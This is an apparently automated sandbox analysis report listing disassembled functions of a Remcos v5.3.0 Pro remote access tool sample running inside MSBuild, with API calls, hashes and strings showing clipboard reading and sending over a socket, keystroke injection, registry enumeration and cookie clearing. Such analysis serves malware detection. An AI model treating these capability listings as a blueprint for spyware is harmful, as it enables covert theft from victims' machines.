                                                                                                                                            • Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                                                            • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                                                            Function 0041BEB0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                                                            • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                                                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Console$Window$AllocOutputShow
                                                                                                                                            • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                                            • API String ID: 4067487056-2527699604
                                                                                                                                            • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                                                            • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                                                            • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                                                            • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                                                            Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SendInput.USER32 ref: 00418B08
                                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                                                              • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InputSend$Virtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1167301434-0
                                                                                                                                            • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                            • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                                                            • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                            • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                                                            Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenClipboard.USER32 ref: 00415A46
                                                                                                                                            • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2172192267-0
                                                                                                                                            • Opcode ID: a4bc90c7b42ad257af3d3a405f0387b9fe529ea6a62e82e0e8fb23c7bb9faa15
                                                                                                                                            • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                                                                            • Opcode Fuzzy Hash: a4bc90c7b42ad257af3d3a405f0387b9fe529ea6a62e82e0e8fb23c7bb9faa15
                                                                                                                                            • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                                                                            Function 00446159 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                                                                            • String ID: a/p$am/pm$u;~/
                                                                                                                                            • API String ID: 3509577899-3369845873
                                                                                                                                            • Opcode ID: 3e928ede4659587d97ed5dfbbe89dc282e212a9f54712889c1654def3b5faaeb
                                                                                                                                            • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                                                            • Opcode Fuzzy Hash: 3e928ede4659587d97ed5dfbbe89dc282e212a9f54712889c1654def3b5faaeb
                                                                                                                                            • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                                                            Function 0044016A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 0-1979702588
                                                                                                                                            • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                                                            • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                                                            • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                                                            • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                                                            Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                            • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                                            • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                                                            • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                                            • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                                                            Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                                                                                                            • __fassign.LIBCMT ref: 1000954F
                                                                                                                                            • __fassign.LIBCMT ref: 1000956A
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                            • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                            • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                            • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                            • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                            Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: HE$HE
                                                                                                                                            • API String ID: 269201875-1978648262
                                                                                                                                            • Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                                                                            • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                                                            • Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                                                                            • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                                                            Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                                              • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                              • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                            • String ID: TUFTUF$>G$DG$DG
                                                                                                                                            • API String ID: 3114080316-344394840
                                                                                                                                            • Opcode ID: c7dacded70064eff084c5483823ad627ae37bda4e5083f92a4c54b5f216bc74c
                                                                                                                                            • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                                                            • Opcode Fuzzy Hash: c7dacded70064eff084c5483823ad627ae37bda4e5083f92a4c54b5f216bc74c
                                                                                                                                            • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                                            Function 00443098 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 269201875-1979702588
                                                                                                                                            • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                            • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                                                                                            • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                            • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                                                                            Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm
                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                            • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                            • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                            • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                            • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                            Function 0044FED3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                                                                            • __freea.LIBCMT ref: 0044FFC4
                                                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 313313983-1979702588
                                                                                                                                            • Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                                                                            • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                                                                            • Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                                                                            • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                                                                            Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                            • API String ID: 1133728706-4073444585
                                                                                                                                            • Opcode ID: 9f830491a43924aacef6b89cd49d596dbc1a7be0786a055df37cbe98fa0b0cad
                                                                                                                                            • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                                                            • Opcode Fuzzy Hash: 9f830491a43924aacef6b89cd49d596dbc1a7be0786a055df37cbe98fa0b0cad
                                                                                                                                            • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                                                            Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 02717eb42979939780aa55e78abd64da983f54570bcab5d4a33c232e0763f4b4
                                                                                                                                            • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                                                            • Opcode Fuzzy Hash: 02717eb42979939780aa55e78abd64da983f54570bcab5d4a33c232e0763f4b4
                                                                                                                                            • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                                                            Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                                            • int.LIBCPMT ref: 0040FC0F
                                                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                            • String ID: P[G
                                                                                                                                            • API String ID: 2536120697-571123470
                                                                                                                                            • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                                                            • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                                                            • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                                                            • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                                                            Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                            • _free.LIBCMT ref: 100092AB
                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                            • _free.LIBCMT ref: 100092B6
                                                                                                                                            • _free.LIBCMT ref: 100092C1
                                                                                                                                            • _free.LIBCMT ref: 10009315
                                                                                                                                            • _free.LIBCMT ref: 10009320
                                                                                                                                            • _free.LIBCMT ref: 1000932B
                                                                                                                                            • _free.LIBCMT ref: 10009336
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                            • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
